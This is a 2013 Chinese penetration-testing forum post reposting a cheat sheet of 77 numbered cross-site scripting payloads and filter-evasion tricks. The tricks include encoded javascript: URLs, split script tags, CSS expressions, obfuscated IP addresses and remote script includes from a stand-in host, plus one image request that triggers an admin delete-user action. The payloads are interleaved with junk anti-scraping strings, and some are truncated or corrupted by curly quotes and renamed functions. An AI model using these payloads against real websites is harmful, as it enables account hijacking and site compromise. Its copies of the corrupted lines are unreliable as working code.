中国网络渗透测试联盟
标题:
XSS攻击汇总
[打印本页]
作者:
admin
时间:
2013-4-19 19:22
标题:
XSS攻击汇总
貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。
* B6 Q+ M. I- f! p* z5 [$ M: s
(1)普通的XSS JavaScript注入
" e; y \! |; G) Z" ^
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
5 H: m* a- P4 H! x8 k! f3 j/ V- v
(2)IMG标签XSS使用JavaScript命令
. r5 K. c: B- f) m0 R
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
9 d9 H$ |1 p& {5 D" j. H6 A
(3)IMG标签无分号无引号
5 `: ` t" B) e6 Y& ^$ Y2 @
<IMG SRC=javascript:alert(‘XSS’)>
9 O! ~( b( P0 ^0 I; ~
(4)IMG标签大小写不敏感
# q) [, x+ V! o( U; N
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
0 U/ Y; o. A# a+ Z% g& l K
(5)HTML编码(必须有分号)
8 B' \5 A. R6 |' H1 h: C9 |; A
<IMG SRC=javascript:alert(“XSS”)>
- v, y$ {1 Y2 |4 |5 e9 g) B: H& Z: E7 Z5 L
(6)修正缺陷IMG标签
+ D l7 I- z' C7 p
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
3 ]7 }+ B# X+ l+ M( b% y3 L
8 G1 X8 e6 i) d& i/ o1 S& r/ e
^, o: ~- p' k& B6 K$ `
(7)formCharCode标签(计算器)
2 N; [3 n+ ]% ]: H; i& U _! {! e( Q, r
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
. I( N! k/ t7 \3 x4 D _
(8)UTF-8的Unicode编码(计算器)
4 A9 f/ w8 p+ C7 p
<IMG SRC=jav..省略..S')>
; U! z8 V: L/ z; V
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
5 B/ n% h2 L; Y& i
<IMG SRC=jav..省略..S')>
7 d0 |. W% B+ R L1 R
(10)十六进制编码也是没有分号(计算器)
. a X$ y I4 J" X, h* {; C$ x
<IMG SRC=java..省略..XSS')>
0 e, n$ F; p* a8 `- g2 L/ O" p
(11)嵌入式标签,将Javascript分开
8 s9 i% H& Z! C& V
<IMG SRC=”jav ascript:alert(‘XSS’);”>
# L0 X7 G% V7 E9 r+ E% Q9 }; r
(12)嵌入式编码标签,将Javascript分开
7 t9 s9 q5 a1 Q' a( q1 o: U) I
<IMG SRC=”jav ascript:alert(‘XSS’);”>
`" N5 d9 w K! x7 H. `8 r
(13)嵌入式换行符
$ K- q/ B# N, Q) H+ I
<IMG SRC=”jav ascript:alert(‘XSS’);”>
9 r Q+ [% z. W8 h
(14)嵌入式回车
: h; C Q5 }; `4 i7 D
<IMG SRC=”jav ascript:alert(‘XSS’);”>
8 m- n [0 k" O N
(15)嵌入式多行注入JavaScript,这是XSS极端的例子
* F1 D" ?; h2 v" H6 d
<IMG SRC=”javascript:alert(‘XSS‘)”>
7 Q x* t6 a7 `* k6 H
(16)解决限制字符(要求同页面)
* p9 H, l) a7 ~ a, m6 }7 D
<script>z=’document.’</script>
( Y3 J0 q0 Y& @& {4 l
<script>z=z+’write(“‘</script>
5 k+ i/ e5 v+ U8 X4 j/ l( t
<script>z=z+’<script’</script>
8 d9 _0 Y! Q: q3 v
<script>z=z+’ src=ht’</script>
4 v6 D0 }$ N, Z0 [& H1 e/ o, z
<script>z=z+’tp://ww’</script>
; \/ X: x. n, B- C; n
<script>z=z+’w.shell’</script>
+ _6 F5 T7 c2 z# h* P9 f( _7 m
<script>z=z+’.net/1.’</script>
4 F: y; [' x/ H
<script>z=z+’js></sc’</script>
) I V% ?9 t. p5 y7 T4 w
<script>z=z+’ript>”)’</script>
/ O5 F9 R" N" y; @- N2 i- p4 F, y& a
<script>eval_r(z)</script>
6 Z7 [) \' F0 K$ o% M( ~. X3 S" W' _
(17)空字符12-7-1 T00LS - Powered by Discuz! Board
* x+ R. _1 L% ?( A+ I7 ~3 D, ]
https://www.t00ls.net/viewthread ... table&tid=15267
2/6
/ |; z5 z& x* p/ i) q
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
8 N6 y- k- M( R8 z# s
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
; J& T6 W2 o+ V2 N+ S _! F
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
' {/ a' s" J' S; u3 R3 h* ?
(19)Spaces和meta前的IMG标签
4 b) u2 e) N S% g: |
<IMG SRC=” javascript:alert(‘XSS’);”>
: f9 |# E! e' B4 n; i/ ]
(20)Non-alpha-non-digit XSS
$ p: n$ X# m4 {: \* ? a7 m
<SCRIPT/XSS SRC=”
http://3w.org/XSS/xss.js
”></SCRIPT>
% P% I! {: k; n* A( |, S3 u
(21)Non-alpha-non-digit XSS to 2
2 c( Q& o6 z. U% d% c
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
1 O6 T; P! O4 P8 `" k; T1 _2 z
(22)Non-alpha-non-digit XSS to 3
$ a% s3 }. L7 y1 N/ T% y+ p
<SCRIPT/SRC=”
http://3w.org/XSS/xss.js
”></SCRIPT>
. u5 G/ L8 d2 I7 C: o+ ]
(23)双开括号
2 U7 o8 R( a8 a' p
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
! S% @6 V. q9 q# o+ g! z
(24)无结束脚本标记(仅火狐等浏览器)
( L) p2 V" k' C
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
& u, J; ^( M+ b' e2 P; E7 ^) e! @
(25)无结束脚本标记2
7 z* L- W/ \# k" F- U! `+ g! |
<SCRIPT SRC=//3w.org/XSS/xss.js>
& g" m4 n! k1 R5 T |
(26)半开的HTML/JavaScript XSS
) y2 V* x8 _0 T
<IMG SRC=”javascript:alert(‘XSS’)”
% |2 s8 v. e, c5 @, M
(27)双开角括号
% }5 ^4 y7 g8 u' Y8 t
<iframe src=http://3w.org/XSS.html <
4 E. [3 X2 s6 f" ?& U
(28)无单引号 双引号 分号
# B- V9 X. ~9 o% |
<SCRIPT>a=/XSS/
: ^' }- w3 V( N
alert(a.source)</SCRIPT>
$ p/ b# q/ M# M
(29)换码过滤的JavaScript
& z6 k. x; ?5 K+ H8 g$ l0 ~/ _
\”;alert(‘XSS’);//
7 h7 F% _0 t: I t3 @7 z: \; t, t
(30)结束Title标签
& ~* z# Z. L G( C$ N- p
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
9 \! W' U1 b$ l4 \/ `6 A+ k
(31)Input Image
1 X s. z8 q8 A$ \1 V8 E
<INPUT SRC=”javascript:alert(‘XSS’);”>
; R8 e/ C2 B+ x+ v/ N0 g, u9 b
(32)BODY Image
) l9 V3 u6 C- L) h
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
- ^8 z5 } G# W4 B
(33)BODY标签
# Y$ F- I, R [6 v
<BODY(‘XSS’)>
. ]; k7 ^/ l3 o! H2 _0 P
(34)IMG Dynsrc
) N f% }2 r9 p$ O6 h9 I% ~* A
<IMG DYNSRC=”javascript:alert(‘XSS’)”>
9 ~. z# Y5 b7 f/ k& T" x( I4 }5 T
(35)IMG Lowsrc
5 m; S* e' K0 |
<IMG LOWSRC=”javascript:alert(‘XSS’)”>
8 X) \" G5 `' G! l1 t6 r' G' P
(36)BGSOUND
8 Y* {! j/ J# r& t5 O& y* l
<BGSOUND SRC=”javascript:alert(‘XSS’);”>
: k5 |8 B3 A0 M y/ P* F4 {
(37)STYLE sheet
! r ?; w5 K8 W9 `$ N7 T
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
+ ?8 g- n. c* t
(38)远程样式表
9 m! }, L# H1 e) b* x
<LINK REL=”stylesheet” HREF=”
http://3w.org/xss.css
”>
, Q ~: f8 s/ g' b# I7 R% W+ d
(39)List-style-image(列表式)
. V$ S+ `. I1 @7 V8 O* f# t
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
2 T, x. f" F9 U3 f; S6 B
(40)IMG VBscript
5 p4 F# c$ y- I ~- H$ P' |
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
" d5 l) g' @ c- V, }( ~
(41)META链接url
& d6 k: N/ x# U! z4 S3 J( P# Y0 O
$ k6 i! q5 _; J. c/ A
! F1 v) a# {! R. o4 i5 X, L E
<META HTTP-EQUIV=”refresh” CONTENT=”0;
1 u" x* @9 c" d8 L& c; F
URL=http://;URL=javascript:alert(‘XSS’);”>
( e1 N& G0 V- B8 T; r
(42)Iframe
5 m1 O6 h. }: q0 B6 I3 B
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
- ~6 x9 C, `8 e, ~# A; Q5 w
(43)Frame
u4 J% q3 ?: f V8 Q9 f
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board
( I) E1 {2 S c9 `1 |
https://www.t00ls.net/viewthread ... table&tid=15267
3/6
; w4 t" n2 q+ [1 f, F$ ~
(44)Table
1 y" r3 Q T) f9 k: J% b3 g
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
+ `( m9 e; [ c1 G. K+ o Q9 \" I4 b
(45)TD
6 p$ _" Z$ I; b
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
1 f& ^1 s! o" C2 k! f) y
(46)DIV background-image
8 U A+ o7 S7 p% H
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
0 r0 b) ?8 s2 V7 J
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-
}) ]$ {/ P/ @& u k: u; l
8&13&12288&65279)
# h: j# }6 A% O7 g
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
6 m% D8 k3 ^4 m, d! {
(48)DIV expression
/ T! C- d J _, p* h
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
2 {- Y5 y1 o) D- b4 d# R
(49)STYLE属性分拆表达
! Z3 f/ b5 r/ a; m0 b' q! u7 |8 J
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
$ M$ H8 e. H& W2 a
(50)匿名STYLE(组成:开角号和一个字母开头)
" k" F# U! {9 G! S1 g$ B( e5 u
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
. c( v/ E/ M. q2 {2 y" \
(51)STYLE background-image
# P$ E6 `7 w- b
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A
\, p/ k6 V" M, q% w0 d
CLASS=XSS></A>
4 X; X) F: I. H ~
(52)IMG STYLE方式
' f! w8 J3 z! T0 T6 J. h5 @
exppression(alert(“XSS”))’>
8 m% S: N& |, Q; z7 j& d
(53)STYLE background
+ M3 O$ r3 v4 k3 o
<STYLE><STYLE
+ ]( @+ O/ V! d) v+ {
type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
" x0 R% L4 w9 X' N" v, m/ t v1 j7 X
(54)BASE
: W& f3 _; \ Q q, C6 U5 s
<BASE HREF=”javascript:alert(‘XSS’);//”>
3 k4 o/ S8 T; I/ s/ Z
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
( J7 \2 v( v9 t+ X3 M" w/ U
<EMBED SRC=”
http://3w.org/XSS/xss.swf
” ></EMBED>
3 j; t0 f: C' \2 D6 W$ H' S1 e5 p
(56)在flash中使用ActionScrpt可以混进你XSS的代码
* A1 v: C" Q* C, y3 n0 n! t+ Y8 L) S
a=”get”;
V! C2 P4 D" ~% p( T7 Y
b=”URL(\”";
" U! t, U) x: b5 W: Q6 j5 X3 `
c=”javascript:”;
" C' L4 S4 I5 u
d=”alert(‘XSS’);\”)”;
V8 R0 z$ r1 ~. P
eval_r(a+b+c+d);
, v- z* w4 J/ s3 N3 F/ o7 I
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
) b. V* V% _, y9 G4 T5 Y
<HTML xmlns:xss>
& [. x* Q# d. H- [5 P1 j* Z
<?import namespace=”xss” implementation=”
http://3w.org/XSS/xss.htc
”>
* g6 c+ }. J7 L4 C6 o. V7 Q
<xss:xss>XSS</xss:xss>
/ S+ G" @+ J# o) F- m; K
</HTML>
. X6 d4 ~+ P2 B6 g4 m3 k" N
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
- J. d2 g3 r$ q! e" o/ Y
<SCRIPT SRC=””></SCRIPT>
& p4 q# R U v" g- m6 [' c! p" Z
(59)IMG嵌入式命令,可执行任意命令
. S2 D4 z/ I) r* w/ _# I* m q4 d
<IMG SRC=”
http://www.XXX.com/a.php?a=b
”>
7 n) @4 J* Y( }) @
(60)IMG嵌入式命令(a.jpg在同服务器)
* C8 k* Z3 u4 S/ G' V
Redirect 302 /a.jpg
http://www.XXX.com/admin.asp&deleteuser
- v$ _4 w* Z b* [! C( v/ `
(61)绕符号过滤
" k9 u; |1 s/ v7 i3 O2 y
<SCRIPT a=”>” SRC=”
http://3w.org/xss.js
”></SCRIPT>
: U- V) |+ h% ~0 S, C
(62)
+ l% G6 |# I d* V% F: j! f
<SCRIPT =”>” SRC=”
http://3w.org/xss.js
”></SCRIPT>
" D9 I2 W4 _0 Y* G2 Z+ H+ a L/ t7 _
(63)
5 C' Q$ K" u3 \- z
<SCRIPT a=”>” ” SRC=”
http://3w.org/xss.js
”></SCRIPT>
$ b: K1 }: D/ V3 n; h8 a4 B
(64)
, a* y8 I! t1 L: Y% c
<SCRIPT “a=’>’” SRC=”
http://3w.org/xss.js
”></SCRIPT>
9 a- q; G$ f9 D; \# H1 P
(65)
4 X5 D* b: x) U6 o. s
<SCRIPT a=`>` SRC=”
http://3w.org/xss.js
”></SCRIPT>
$ V& G \2 O6 A
(66)12-7-1 T00LS - Powered by Discuz! Board
1 _8 `" p3 \ V' M4 _3 R+ h
https://www.t00ls.net/viewthread ... table&tid=15267
4/6
W7 l2 H3 [% ]3 P6 E
<SCRIPT a=”>’>” SRC=”
http://3w.org/xss.js
”></SCRIPT>
! S% n- Q* x) _. t- b; z- b4 X
(67)
/ p5 b$ @5 }# \' M
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”
http://3w.org/xss.js
”>
8 w+ e' h* ?4 n4 K3 ^5 ?! c: z
</SCRIPT>
5 S4 h2 M9 X1 W: M$ v
(68)URL绕行
6 t) j; }, i# ?/ z2 K% E
<A HREF=”
http://127.0.0.1/
”>XSS</A>
1 O0 C {# _4 q! p
(69)URL编码
& e& S+ h' J8 y! Q2 `
<A HREF=”
http://3w.org
”>XSS</A>
4 C5 K; y2 }2 H6 e4 E
(70)IP十进制
$ R. s @) ?, U! {6 k; \% G4 S
<A HREF=”http://3232235521″>XSS</A>
: Z n$ K1 p$ ~* p8 p5 r
(71)IP十六进制
8 R* \& l; t( n; Y2 y# }
<A HREF=”
http://0xc0.0xa8.0
×00.0×01″>XSS</A>
% o5 `0 r* p L* A
(72)IP八进制
" k D8 @$ W9 i( x: K) d, C& ?: ]* L
<A HREF=”
http://0300.0250.0000.0001
″>XSS</A>
) Y( x; H S: `2 n6 `
(73)混合编码
8 G: X% g' E" F
<A HREF=”h
1 E9 u y5 X" p& V3 {9 k0 I7 X7 ^
tt p://6 6.000146.0×7.147/”">XSS</A>
' G3 S8 y+ c( U" J9 {$ n
(74)节省[http:]
( V8 D/ ~" L( p9 }. \3 g0 s
<A HREF=”//www.google.com/”>XSS</A>
% p' a$ v+ |, w! F
(75)节省[www]
. w7 T! d1 g8 B+ A# z- _6 W- S7 ^
<A HREF=”
http://google.com/
”>XSS</A>
$ L& f0 s9 p8 i
(76)绝对点绝对DNS
. B2 O* m2 M/ ]' Z/ y$ l, V
<A HREF=”
http://www.google.com./
”>XSS</A>
( k* N5 C: P2 F8 ~' |% [5 b
(77)javascript链接
9 j _1 p \- \4 W" V3 {
<A HREF=”javascript:document.location=’
http://www.google.com/
’”>XSS</A>
' D" b9 S* k7 u [ [$ |
+ M; d, g1 |# P
原文地址:
http://fuzzexp.org/u/0day/?p=14
& f0 }, [4 I Q! H5 I9 L' D9 N
- W& A4 B, g! `! b2 O* S0 `" P
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2